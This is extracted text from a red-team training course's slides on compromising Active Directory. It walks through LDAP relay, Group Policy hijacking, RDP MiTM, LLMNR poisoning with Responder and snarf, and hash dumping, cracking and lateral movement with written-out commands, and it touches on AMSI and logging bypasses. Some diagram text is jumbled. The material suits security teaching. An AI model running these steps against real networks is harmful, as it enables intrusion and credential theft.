3.1.

Introduction

3.2. Active Directory fundamentals

3.3. Traditional AD attacks

3.4. Red team oriented AD attacks

3.5 Kerberos tickets when NTLM is disabled

3.6 Password spraying using Kerberos

3.7 Persisting in Active Directory

PT e treme - Caendra Inc. © 2017

PT e treme - Caendra Inc. © 2017
As far as the overall security posture of organizations is
concerned, they have been focusing on the perimeter for years.
Our job has been relatively easy.

PT e treme - Caendra Inc. © 2017

This has changed over the last few years, with organizations
integrating and utilizing security enhancements, that not
only harden their internal infrastructure, but also allow for
better infrastructure monitoring and logging.

PT e treme - Caendra Inc. © 2017

We have already seen how we can gain an initial foothold in
the targeted network, by means of an advanced social
engineering attack. We have also covered advanced concepts
in Active Directory reconnaissance and enumeration.

PT e treme - Caendra Inc. © 2017

In this module we will cover:
• Ways in which we can totally compromise an
organization’s network.

PT e treme - Caendra Inc. © 2017

We will focus our attention on Windows environments and
especially Active Directory (AD) since this is the type of
environment most organizations have in place due to its
versatility and management capabilities.

PT e treme - Caendra Inc. © 2017

Additionally, AD is constructed and used in such a way, that if
compromised, most of the organization’s assets and sensitive
data can be accessed as well.

PT e treme - Caendra Inc. © 2017

As mentioned before, our approach will be the one of a red
team member (also known as the low and slow approach),
but for completeness' sake, we will showcase key concepts of
the traditional approach as well. This will help us understand
the benefits of the red team approach.

PT e treme - Caendra Inc. © 2017

When delivering an advanced penetration test or red team
exercise, we want our activities to look like normal actions.
Not only we will be stealthy this way, but we will minimize
the possibilities of disrupting normal operations as well.

PT e treme - Caendra Inc. © 2017

Before covering red team oriented attacks, let’s first get
familiar with the Active Directory environment and then, we
will cover some key concepts of the traditional network
penetration testing approach.

PT e treme - Caendra Inc. © 2017

PT e treme - Caendra Inc. © 2017
Active Directory, or AD, is a Windows-based directory
service. It allows for centralized management of
authentication and authorization.

PT e treme - Caendra Inc. © 2017

Active Directory enables administrators to deploy role-based
access control and least privilege efficiently.

PT e treme - Caendra Inc. © 2017

Active Directory grants access based on Kerberos tickets.

Non-Windows devices, such as firewalls, can also

authenticate against AD using LDAP or RADIUS.

PT e treme - Caendra Inc. © 2017

Many companies use Active Directory for Single Sign-On or
SSO, which allows internal sites, email access, FTP and other
server programs to authenticate users based on their AD
credentials.

PT e treme - Caendra Inc. © 2017

A word of caution with SSO, the credentials are only as
strong as the weakest link.

For example, if there is a weak internal site that

authenticates a user using his AD credentials, an attacker
could potentially compromise that site and retrieve AD
credentials.

PT e treme - Caendra Inc. © 2017

Whenever a connection, a query or modification must occur
on a directory service, LDAP (Lightweight Directory Access
Protocol) comes into play.

Following this slide, there is a brief overview of LDAP.

PT e treme - Caendra Inc. © 2017

Lightweight Directory Access Protocol (LDAP)
• X.500 Standard
• Based on TCP/IP
• A method for accessing, searching, and modifying a
directory service
• A client-server model

PT e treme - Caendra Inc. © 2017

As far as authentication on Active Directory is concerned, the
most common way for users to authenticate is by providing a
username and password.

However, some computer systems also support

authentication based on smart cards, one-time passwords,
or biometric information.

PT e treme - Caendra Inc. © 2017

Authentication in Active Directory

Common Logon Scenarios

➢ Interactive logon: grants access to the local computer
➢ Network authentication: grants access to network resources

PT e treme - Caendra Inc. © 2017

Common authentication Security Support Providers on
Windows Systems:
➢ NTLM
➢ Kerberos

PT e treme - Caendra Inc. © 2017

Kerberos Authentication Steps
1. User authenticates to KDC. The initial request 4. KDC decrypts the TGT and creates a service ticket. The
encrypts the current UTC timestamp with a long- user’s PAC information is copied from the TGT to the new
term key. ticket. KDC then sends the service ticket to the user, who will
pass it on to the target service. The ticket is encrypted with the
target service account’s long-term key.
2. If KDC can decrypt the timestamp
with the user’s key that is stored on
AD and the time is within the 5. User sends the service ticket and the service
accepted skew, authentication decrypts the ticket with its long-term key. The
succeeds. KDC then creates a TGT, user’s PAC information are included in the
encrypted with the ‘krbtgt’ encrypted ticket, allowing the service to determine
account’s long-term key. The TGT is the user’s authorization level for the service.
really just a special service ticket.
Like all service tickets, it includes 6. Service requests KDC to verify the
user identity information in a ‘krbtgt’ signature for the PAC data.
Privilege Attribute Certificate (PAC).
7. Service sends encrypted
3. User requests a timestamp for user validation
service ticket from (provides mutual
the KDC. The request authentication)
includes the user’s
TGT (from step 2),
encrypted with the
‘krbtgt’ account’s
long-term key. ADSecurity.org
PT e treme - Caendra Inc. © 2017
Hijacking Kerberos
Tickets to Remotely
Access the Intranet

PT e treme - Caendra Inc. © 2017

Weaknesses
NTLM Kerberos
The encryption employed can be cracked When RC4 encryption is employed, what we have is
actually the NTLM hash
No mutual authentication Compromise of the long term key equals
compromise of Kerberos
The user’s hash is the basis of all communications Credential reuse is possible

Credential reuse is possible TGS PAC validation is usually skipped

Credential can be leaked from a user’s browser

PT e treme - Caendra Inc. © 2017

For your reference, the next two slides contain the attacks
that target NTLM and Kerberos authentication. Do not worry
if you are unfamiliar with some of them. We will cover the
most important ones, as the module progresses.

PT e treme - Caendra Inc. © 2017

NTLM Attacks
✓ SMB Relay
✓ Intranet HTTP NTLM authentication - Relay to attacker
✓ NBNS/LLMNR Poisoning (including WPAD attacks)
✓ HTTP -> SMB NTLM Relay
✓ ZackAttack - SOCKS proxy, SMB/HTTP, LDAP etc.
✓ Pass-the-hash

PT e treme - Caendra Inc. © 2017

Kerberos Attacks
✓ Replay Attacks
✓ Pass-the-Ticket
✓ Over-pass-the-Hash (aka pass the key)
✓ Offline (User) Password Cracking (Kerberoast)
✓ Forged Tickets – Golden/Silver
✓ Diamond PAC
✓ MS14-068
✓ Skeleton Key
PT e treme - Caendra Inc. © 2017
Let’s now see how authorization works on Active Directory.

When a user logs on to a system, he submits his credentials

in order to interact with resources.

PT e treme - Caendra Inc. © 2017

Active Directory validates access to a resource based on the
user’s security token. The security token, in essence, is the
procedure of checking whether the user is included in the
Access Control List (ACL) for the requested object/resource.

PT e treme - Caendra Inc. © 2017

Some of the types of attributes that might be contained in
the security token are:
• user group
• ownership
• admin privileges

PT e treme - Caendra Inc. © 2017

The primary means by which a security principal is identified
when trying to access network resources is an identifier
called security identifier (SID). The SID attribute is unique for
each user or security group.

PT e treme - Caendra Inc. © 2017

An access control list (ACL) is a list of access control entries
(ACE). Each ACE in an ACL identifies a security principal and
the access rights allowed, denied or audited for that
principal.

The security descriptor for a securable object can contain

two types of ACLs: a DACL and a SACL.

PT e treme - Caendra Inc. © 2017

A discretionary access control list (DACL) identifies the
security principals that are allowed or denied access to an
object.

When a person or process tries to access an object, the

system checks the ACEs in the object's DACL to determine
whether to grant access to it.

PT e treme - Caendra Inc. © 2017

A system access control list (SACL) enables administrators to
log attempts to access a secured object.

Each ACE specifies the types of access attempts by a

specified principal that cause the system to generate a
record in the security event log.

An ACE in a SACL can generate audit records when an access

attempt fails, when it succeeds, or both.
PT e treme - Caendra Inc. © 2017
Authorization overview in Active Directory

Security principals are issued User accounts are issued security

security identifiers (SIDs) when tokens during authentication that
the account is created include the user’s SID and all
related group SIDs

Shared resources on a network The security token is compared

include access control lists (ACL) against the Discretionary Access
that define who can access the Control List (DACL) on the
resource resource and access is granted or
denied

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
PT e treme - Caendra Inc. © 2017
Active Directory Domain Services require a DNS
infrastructure to operate. Active Directory supports AD
integrated DNS. In the case of AD integrated DNS, DNS
information is stored in Active Directory and replicated
through it.

Following this slide, there is a brief overview of the AD and

DNS relations.

PT e treme - Caendra Inc. © 2017

Active Directory & DNS

AD DS requires a DNS AD DS domain names must be

infrastructure DNS domain names

DNS Domain
Name

DNS

AD DS domain controller DNS zones can be stored in AD

records must be registered in DS as Active Directory integrated
DNS to enable other domain zones
controllers and client computers
to locate the domain controllers
DNS
Zone

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
PT e treme - Caendra Inc. © 2017
Active Directory Domain Services consist of various physical
and logical components.

PT e treme - Caendra Inc. © 2017

Various partitions exist in AD DS:
domain directory, configuration
directory, schema directory,
application directory etc.

AD DS is composed of both physical and logical components Defines the list of attributes all
Stores the AD DS objects in the AD DS can have.
information. This is a file on
each domain controller.
Physical Components Logical Components Logical, administrative boundary
for users and computers
• Data store • Partitions
Contain a copy of AD DS
Collection of domain controllers
database.
• Domain controllers • Schema that share a common root
domain.
• Global catalog server • Domains
Hosts the global catalog,
which is a partial, read-only • Read-Only Domain • Domain trees Collections of domains sharing a
common AD DS.
copy of all the domain Controller (RODC)
naming contexts in the • Forests
forest. A global catalog Collections of users, groups,
speeds up searches for • Sites computers as defined by their
objects that might be physical locations. Useful during
attached to other domain • Organizational units (OUs) replication tasks.
controllers in the forest.
Organizes the elements found
at a given site or domain for
https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233 the purposes of securing
them more selectively.
PT e treme - Caendra Inc. © 2017
First, let’s go through the AD DS physical components:
• Domain Controllers
• Global Catalog Servers
• Data Store
• Replication
• Sites

PT e treme - Caendra Inc. © 2017

Domain Controllers
A domain controller is a server with the AD DS server role installed that has
specifically been promoted to a domain controller

Domain controllers:
• Host a copy of the AD DS directory store

• Provide authentication and authorization services

• Replicate updates to other domain controllers in the domain and forest

• Allow administrative access to manage user accounts and network resources

Windows Server 2008 and later supports RODCs

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
PT e treme - Caendra Inc. © 2017
Things to note regarding Domain Controllers:
• Each domain controller holds a copy of the directory store and updates
can be made to the AD DS data on all domain controllers except for
RODCs.

• You can find multiple domain controllers in a domain.

• All domain controllers engage in authentication and authorization.

PT e treme - Caendra Inc. © 2017

Things to note regarding RODCs:
• A read-only DC is actually read-only DC services, read-only DNS, read-only
SYSVOL etc.

• A read-only DC has its own KRBTGT account, which means that Kerberos
is cryptographically isolated from the rest of the domain. RODCs do not
have any domain related passwords on them, by default.

PT e treme - Caendra Inc. © 2017

Global Catalog Servers
Global catalog servers are domain controllers that also store a copy of the global
catalog

The global catalog:

• Contains a copy of all AD DS objects in a forest that includes only some of
the attributes for each object in the forest

• Improves efficiency of object searches by avoiding unnecessary referrals to

domain controllers

• Required for users to log on to a domain

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
PT e treme - Caendra Inc. © 2017
Things to note regarding Global Catalog Servers:
• Administrators cannot enter information directly into this partition. The
global catalog builds and updates its content based on values of a schema
attribute (isMemberOfPartialAttributeSet), thus deciding when to
replicate that attribute of an AD DS object in the global catalog.

PT e treme - Caendra Inc. © 2017

What is the AD DS Data Store?
The AD DS data store contains the database files and processes that store and
manage directory information for users, services, and applications

The AD DS data store:

• Consists of the Ntds.dit file

• Is stored by default in the %SystemRoot%\NTDS folder on all domain

controllers

• Is accessible only through the domain controller processes and protocols

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
PT e treme - Caendra Inc. © 2017
Things to note regarding the AD DS Data Store:
• The NTDS.DIT file is a database mainly used to:
1. Store the objects accessible in Active Directory
2. Provide references to objects
3. Store the security descriptors

• The AD DS database is managed by the DC only.

PT e treme - Caendra Inc. © 2017

What is AD DS Replication?
AD DS replication copies all updates of the AD DS database to all other domain
controllers in a domain or forest

AD DS replication:
• Ensures that all domain controllers have the same information

• Uses a multimaster replication model

• Can be managed by creating AD DS sites

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
PT e treme - Caendra Inc. © 2017
Things to note regarding AD DS Replication:
• Domain controllers in the same site replicate their data, typically within
15 seconds after a change, completing replication with all members in a
properly configured tree in about 45 seconds.

PT e treme - Caendra Inc. © 2017

Domains
Domains are used to group and manage objects in an
organization
Contoso.co
m

Domains:
• An administrative boundary for applying policies to groups of objects

• A replication boundary for replicating data between domain controllers

• An authentication and authorization boundary that provides a way to limit

the scope of access to resources

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
PT e treme - Caendra Inc. © 2017
All of the domain controllers in a particular domain can
receive changes and replicate those changes to all other
domain controllers in the domain.

Each domain in Active Directory is identified by a Domain

Name System (DNS) domain name and requires one or more
domain controllers.

PT e treme - Caendra Inc. © 2017

Trees
contoso.co
m
A domain tree is a hierarchy of domains in AD DS

emea.contoso.co na.contoso.co
m m

All domains in the tree:

• Share a contiguous namespace with the parent domain

• Can have additional child domains

• By default create a two-way transitive trust with other domains

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
PT e treme - Caendra Inc. © 2017
Forests
A forest is a collection of
one or more domain trees

Forests:
• Share a common schema

• Share a common configuration partition

• Share a common global catalog to enable searching

• Enable trusts between all domains in the forest

• Share the Enterprise Admins and Schema Admins groups

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
PT e treme - Caendra Inc. © 2017
Organizational Units
OUs are Active Directory containers that can contain users, groups, computers, and
other OUs

OUs are used to:

• Represent your organization hierarchically and logically

• Manage a collection of objects in a consistent way

• Delegate permissions to administer groups of objects

• Apply policies

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
PT e treme - Caendra Inc. © 2017
Trusts
Trusts provide a mechanism for users to gain access to resources in another domain

Types of Trusts Description Diagram

The trust direction flows from Access

Directional trusting domain to the trusted
domain
TRUST

The trust relationship is extended Trust &

Transitive beyond a two-domain trust to Access
include other trusted domains

• All domains in a forest trust all other domains in the forest

• Trusts can extend outside the forest

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
PT e treme - Caendra Inc. © 2017
Things to note regarding AD Trusts:
• Domains can allow access to shared resources outside of their
boundaries by using a trust. Forest trusts allow users to access resources
in any domain in the other forest, as well as logon to any domain in the
forest.

PT e treme - Caendra Inc. © 2017

For a complete picture of the Active Directory structure and
internals please refer to the following links.

✓ https://msdn.microsoft.com/en-us/library/bb727030.aspx

✓ https://www.microsoftpressstore.com/articles/article.asp
x?p=2217264

PT e treme - Caendra Inc. © 2017

PT e treme - Caendra Inc. © 2017
In this module, we are going to cover:
• The most effective network manipulation/exploitation
techniques that have proven effective over the years.

PT e treme - Caendra Inc. © 2017

LDAP Relay
We assume familiarity with SMB relay.

In the case of classic SMB relay, the Domain Controller is

immune and can’t be used as a target due to the “SMB
Signing” option being enabled by default, which is why we
want to remind you of a technique called LDAP Relay.

PT e treme - Caendra Inc. © 2017

LDAP Relay

LDAP Relay can be seen as the good old NTLM Relay with a
twist. The third party host to which we will relay credentials
will be the Domain Controller. LDAP Relay leverages the fact
that signed Lightweight Directory Access Protocol (LDAP)
binds are not required, by default. Consequently, replay
attacks are feasible.

PT e treme - Caendra Inc. © 2017

LDAP Relay

Let’s see how we can perform LDAP relaying using

intercepter-ng.

PT e treme - Caendra Inc. © 2017

LDAP Relay

The attacks lifecycle is the following:

1. Identify a Domain Administrator’s workstation

2. Become a man in the middle between his workstation and the gateway

3. Inject a hidden link in the web traffic pointing to a HTTP listener that
requests NTLM authentication

4. Redirect the captured credentials to the DC

PT e treme - Caendra Inc. © 2017

LDAP Relay

The environment is the following:

• 192.16.1.100 DC (Windows Server 2008*)
• 192.16.1.13 Domain Administrator’s workstation (Windows 8 machine)
• Signed LDAP binds are not required (this is by default)

*The attack was feasible against an insufficiently

secured Windows Server 2012 R2 DC as well
PT e treme - Caendra Inc. © 2017
LDAP Relay
1 2
192.16.1.13 is identified as a Domain Inside the sniffer configuration we click on the “Expert
Administrator’s workstation. We add it as the target. Mode” and enable the LDAP relaying functionality
We also add 192.16.1.1 as the gateway.

3
We also enable “LDAP Relay” on the MiTM options

4 5
We submit the DC’s IP address and start ARP poisoning Once our link is injected the “credentials” are relayed to
the Domain Controller and intercepter-ng adds a new
user with administrative privileges called “cepter”.

PT e treme - Caendra Inc. © 2017

Exploiting Group Policies
Group Policy is an infrastructure that allows administrators to
implement specific configurations for users and computers.

Group Policy settings are contained in Group Policy objects

(GPOs), which are linked to the following Active Directory service
containers:
• Sites,
• Domains, or
• organizational units (OUs).
PT e treme - Caendra Inc. © 2017
Exploiting Group Policies

The settings within GPOs are then evaluated by the affected

targets, using the hierarchical nature of Active Directory.

Any computer that boots identifies what OU it is in and what

Group Policies are applied.

PT e treme - Caendra Inc. © 2017

Exploiting Group Policies

There’s a link in the Group Policy object to SYSVOL containing

where these Group Policy files and settings that need to be
applied are, so that those files are copied down and then
applied.

PT e treme - Caendra Inc. © 2017

Exploiting Group Policies

The interesting thing is, that if we become a man in the

middle between a domain controller SYSVOL share and a
client, we can have that client run our version of that Group
Policy.

PT e treme - Caendra Inc. © 2017

Exploiting Group Policies

The feasibility of such an attack was demonstrated during

MS15-011 disclosure.

This vulnerability allows an attacker to perform a MiTM

attack and send custom GPOs back to a Windows system.

PT e treme - Caendra Inc. © 2017

Exploiting Group Policies

You may be wondering why we should remember an old

patch and technique.

The reason why you should remember this vulnerability is

that it is still relevant.

PT e treme - Caendra Inc. © 2017

Exploiting Group Policies

MS15-011 is one of the few cases where the patch alone isn’t
enough. Additional configuration should occur in order to
secure the affected systems.

For more information please refer to the following link:

https://blog.rapid7.com/2015/03/12/are-you-really-
protected-against-group-policy-bypass-and-remote-code-
execution/

PT e treme - Caendra Inc. © 2017

Exploiting Group Policies

The only publically available exploit for MS15-011 lives the

inside intercepter-ng tool.

Let’s see how we could exploit an affected AD environment

and hijack a group policy.

PT e treme - Caendra Inc. © 2017

Exploiting Group Policies

The environment is the following:

• 10.10.10.101 DC (Windows Server 2008*)
• 10.10.10.9 Target (Windows 7 machine)
• SMB Signing not enforced
• Our Windows attacking machine should:
✓ NOT be domain-joined
✓ Have “Network access: Let Everyone permissions apply to anonymous users” enabled
✓ Have the appropriate “Advanced sharing options” configured so that it is accessible by
the targeted machine

*The attack was feasible against an insufficiently

secured Windows Server 2012 R2 DC as well
PT e treme - Caendra Inc. © 2017
Exploiting Group Policies
1 2
First we scan the targeted network. Then, we add Inside the MiTM Options we tick “GP Hijack”. Then,
10.10.10.9 as a target and 10.10.10.101 as a we start sniffing and ARP poisoning
gateway.

3 4
Once the target searches for an available update for
the Group Policy, the payload (intercepter’s custom
connect back shell) is executed.

PT e treme - Caendra Inc. © 2017

Exploiting Group Policies

Additionally, during the post-exploitation phase, we can

tamper with Group Policy objects in AD or with those
settings files in SYSVOL, and have computers apply our
version of the policy settings.

Group Policies have a lot of capabilities, such as adding local

administrators, adding or updating services, etc.

PT e treme - Caendra Inc. © 2017

Exploiting Group Policies

This is an easy (although detectable) way of spreading the

compromise in an AD environment.

PT e treme - Caendra Inc. © 2017

RDP MiTM
RDP is widely used in Windows environments mainly for
remote administrative tasks.

Often, RDP is vulnerable to MiTM attacks.

PT e treme - Caendra Inc. © 2017

RDP MiTM

A successful MiTM attack against RDP can result in a

decrypted RDP session containing keystrokes and
subsequently (privileged) credentials.

PT e treme - Caendra Inc. © 2017

RDP MiTM

The all time classic tool for RDP MiTM attacks is Cain.

For the specifics of this attack please refer to the following

link: http://www.oxid.it/ca_um/topics/apr-rdp.htm

PT e treme - Caendra Inc. © 2017

RDP MiTM

It should be noted that RDP enhanced with TLS encryption

can also be MiTMed.

A great tool for executing such an attack is Seth. Seth can

also attack RDP configurations enhanced with CredSSP.

PT e treme - Caendra Inc. © 2017

RDP MiTM

It should be noted that Network Level Authentication (NLA)

may prevent this attack from being successful and that ARP
poisoning attacks can be easily detected by modern
defenses.

PT e treme - Caendra Inc. © 2017

RDP MiTM

It is not uncommon to come across environments that are

not properly enforcing NLA on their RDP connections or not
using certificates from a trusted authority to protect them.

PT e treme - Caendra Inc. © 2017

RDP MiTM

If we also take into consideration that users having the

privilege to establish RDP connections are privileged ones,
we can understand how devastating a RDP MiTM attack can
be.

PT e treme - Caendra Inc. © 2017

RDP MiTM

Also be aware of the fact that you can perform passwordless

RDP session hijacking in Windows versions if you have
SYSTEM level access on a box.

This is a very stealthy way of gaining access to sensitive

machines. Actually, this is not an attack; it is a Windows
feature!

PT e treme - Caendra Inc. © 2017

Sniffing Authentication Traffic
Via ARP cache poisoning we can perform MiTM attacks and
put ourselves in a privileged network position, where we can
intercept authentication traffic.

All native network authentication protocols are susceptible

to disclosure attacks through sniffing.

PT e treme - Caendra Inc. © 2017

Sniffing authentication traffic

We can identify usernames and domains easily since they are

flowing in clear text form.

What is more interesting is the possibility of intercepting

password hashes, which as we already know can enable a
variety of attacks. The go-to tools for this are Cain,
intercepter-ng, and PCredz.

PT e treme - Caendra Inc. © 2017

Downgrading NTLM
Even on highly secured environments, it is not uncommon to
come across a LAN Manager authentication level other than
“Send NTLMv2 response only\refuse LM & NTLM”.

In that case, we will be able to perform a NTLM downgrade

attack against the targeted network.

PT e treme - Caendra Inc. © 2017

Downgrading NTLM

Even if a client requests a stronger authentication level, we

can utilize Cain’s functionality to perform a MiTM attack and
downgrade the authentication level.

This way we will gather weaker/crack-able hashes. Once

again, it should be noted that ARP cache poisoning attacks
can be easily detected by modern defenses.

PT e treme - Caendra Inc. © 2017

Non-Microsoft systems leaking credentials
There is a variety of non-Microsoft systems that utilize
Windows authentication. Those systems can leak Windows
credentials.

PT e treme - Caendra Inc. © 2017

Non-Microsoft systems leaking credentials

We should focus our attention on web proxies, internal

applications, virtualization consoles and database servers
which utilize Windows authentication and oftentimes send
credentials in clear text form, using Basic Authentication or
LM network authentication protocols.

PT e treme - Caendra Inc. © 2017

Non-Microsoft systems leaking credentials

Even in the case that they leverage HTTPS we may be able to

extract (privileged) credentials through sniffing traffic.

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning
LLMNR and NBT-NS are both methods of resolving
hostnames to IP addresses.

On a network, if we try to contact a system by name, the first

system that will be reached is DNS.

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

If that fails, LLMNR will be reached followed by NetBIOS.

LLMNR is the successor to NetBIOS. In case a user tries to
access a system, and it cannot be resolved, then an
LLMNR/NetBIOS request will be sent over multicast or
broadcast respectively.

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

The interesting thing is that through poisoning attacks on this

kind of legacy Microsoft broadcast traffic an attacker can
respond to these requests, cause the victim to connect to his
machine, and subsequently intercept hashes.

The go to tool for this kind of attack is Responder.

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

Enhancing Responder for a stealthier approach

Responder is usually used in conjunction with a SMB relaying
tool to gain an initial foothold into a network.

The majority of SMB relaying tools will usually touch disk and
create a new service to provide us with a shell. This is quite
noisy.

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

Let’s follow a stealthier approach using snarf.

Of course, for SMB relaying we will need privileged

credentials to relay and a target that does not enforce SMB
signing.

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

Let’s start supposing that we identified a local

administrator’s workstation (10.10.10.103).

Our attacking machine is 10.10.10.102.

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

To identify machines that do not enforce SMB signing on the

network, we can use RunFinger.py (part of Responder).
>> python RunFinger.py –i IP

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

Before we add 10.10.10.107 as a target, we should

remember that Responder loads several rogue
authentication servers, including a SMB one.

We will use snarf as our SMB server so, we should go to

Responder.conf and set “SMB = Off.”

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

To add 10.10.10.107 as a target on snarf, we fire up snarf, go

to the “Control” tab and specify the target’s IP, as follows:
>> node snarf.js attacking_machine’s_IP

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

Now, we fire up Responder and wait…

>> python Responder.py –I eth0

Responder sends a poisoned answer to the admin’s machine

Snarf captures the SMB connection and keeps it alive

Click “choose” to
use a session.
PT e treme - Caendra Inc. © 2017
LLMNR and NBT-NS poisoning

We are now able to perform a variety of enumeration

activities, leveraging the active session. For example, like
share enumeration.
>> smbclient -L 127.0.0.1 -U whatever

You can supply any

username and
password. Snarf
automatically forwards
the captured user’s
credentials when
connecting to
127.0.0.1:445
PT e treme - Caendra Inc. © 2017
LLMNR and NBT-NS poisoning

…or checking if the built-in administrator account is disabled.

(This is important to understand if pass-the-hash is possible.)

>> net rpc shell -I 127.0.0.1

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning
Most importantly, we can dump hashes from the targeted
machine, without executing any agent, using impacket’s
secretsdump.py.
>> python secretsdump.py ELS/whatever%[email protected]

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

Let’s try and crack this cached credential using JtR. Luckily,
the password was weak enough to crack it.
>> john --format=mscash2 --wordlist=/root/mydict.txt /root/2crack.txt

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

Finally, we use impacket’s wmiexec lateral movement

method, that does not touch disk and does not start any
new service.
>> python wmiexec.py ELS/Administrator:[email protected]

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

To sum up, this is how one can go from SMB relaying to

compromising a machine, without touching disk or enabling
a new service.

PT e treme - Caendra Inc. © 2017

LLMNR and NBT-NS poisoning

Undeniably, the methodology we described is more difficult

to implement than using MSF’s Smbrelay module, Impacket’s
Smbrelayx, or Responder’s Multirelay. It is stealthier though.

PT e treme - Caendra Inc. © 2017

This technique can also prove handy if you happened to relay
an unprivileged user. Let’s see why with an example. Suppose
we want to compromise the machine residing at 10.10.10.107.
We used Responder in conjunction with snarf, but we were
only able to relay the unprivileged user ‘employee4’.

PT e treme - Caendra Inc. © 2017

What we can do, leveraging this unprivileged user, is perform
some user enumeration activities, as follows.
>> net rpc registry enumerate 'HKEY_USERS' -I 127.0.0.1 -U 'ELS\whatever'

>> rpcclient 127.0.0.1 -U 'ELS\whatever' -c "lookupsids S-1-5-21-1770822258-1552498733-

1961591868-500"

We managed to identify
that an Administrator is
logged into 10.10.10.107
by SMB relaying an
unprivileged user

PT e treme - Caendra Inc. © 2017

User enumeration was possible because an unprivileged user
can query the HKU hive. By querying the HKU hive, one can
identify SIDs of logged in users.

Consequently, SMB relaying an unprivileged user and

keeping the session alive with snarf can prove useful,
especially if we haven’t gained an initial foothold yet.

PT e treme - Caendra Inc. © 2017

PT e treme - Caendra Inc. © 2017
In this part, we will perform red-teaming activities against
Active Directory.

We will focus on:

• stealthy exploitation and post-exploitation activities in
order completely compromise the targeted domain.

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD
PowerShell enables us to run code without touching disk,
download and execute code from another system, interface
with .NET and the Windows APIs, and much more.

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

Unfortunately, it has been abused over the last few years by

penetration testers and cyber criminals alike.

This is why, as of PowerShell v5 onwards, some quite

effective security enhancements were introduced.

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

PowerShell v5 Security Enhancements

Red teamers have to tip-toe a little more carefully when
PowerShell v5’s security enhancements are enabled.

Let’s examine the security enhancements and see how they

can be bypassed.

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

1. Script block logging

If the environment has script block logging enabled, even if

we are obfuscating our PowerShell code, before it’s executed
by the PowerShell engine, it’s going to be de-obfuscated and
logged to the event log in 4104.

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

2. System-wide transcript file

If the environment has “system-wide transcript file” enabled,

a share on the network will exist where everything typed in
PowerShell (transcript file) will be sent to that network
share.

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

This means that the environment’s Blue Team will have an

over-the-shoulder transcript of everything that was typed,
for every computer/user.

Following this slide, you can see a system-wide transcript file

in action.

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

3. Constrained language mode

Constrained language mode limits the capability of

PowerShell to base functionality. .NET or COM access and
Win32 API calls through PowerShell are not possible when
constrained language mode is enforced.

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

If an environment has PowerShell version 5 and AppLocker in

allow mode, PowerShell locks down to constrained language
mode automatically.

The same will happen if Device Guard with UMCI is

deployed. Following this slide, you can see constrained
language mode in action.

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

NOTE: When heavily using PowerShell, be extra careful so

that you don’t get caught by PowerShell metering software
such as SCCM or AppLocker in audit mode.

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

4. AMSI (Anti-Malware Scan Interface)

In Windows 10, it gets even more interesting due to the

introduction of the AMSI (Anti-Malware Scan Interface).

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

On AMSI powered systems, any PowerShell or VBScript code,

before it’s executed by the PowerShell engine, is picked up
by the AMSI.

The AMSI, in turn, sends it over to the anti-malware solution.

The anti-malware solution will give a thumbs up or a thumbs
down based on its signature database.

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

If it’s a thumbs down, PowerShell will not execute that code,

whether it is downloaded from the internet and run in
memory or run from a script.

There are some vendors that support AMSI, and these are
Microsoft, ESET, and AVG. Following you can see AMSI in
action.

PT e treme - Caendra Inc. © 2017

PowerShell Defenses in AD

PT e treme - Caendra Inc. © 2017

Let’s now see how one can bypass those PowerShell v5’s
security enhancements.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

AMSI Bypasses
There are ways to bypass AMSI. Matt Graeber, the author of
PowerSploit, came up with a PowerShell cmdlet that
bypasses AMSI, using reflection.

Additionally, since reflection techniques are considered

"suspicious" and can be caught by WMF5, he came up with
an AMSI bypass that bypasses WMF5 auto-logging as well.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

Around the same time, another AMSI bypass was

implemented leveraging DLL hijacking and then yet another
bypass via COM hijacking.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

Lee Christensen released unmanaged PowerShell (rolled into

Metasploit), which allows us to call PowerShell commands
and run PowerShell code without calling powershell.exe,
among other things.

This can also be considered an AMSI bypass (avoidance

actually).

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

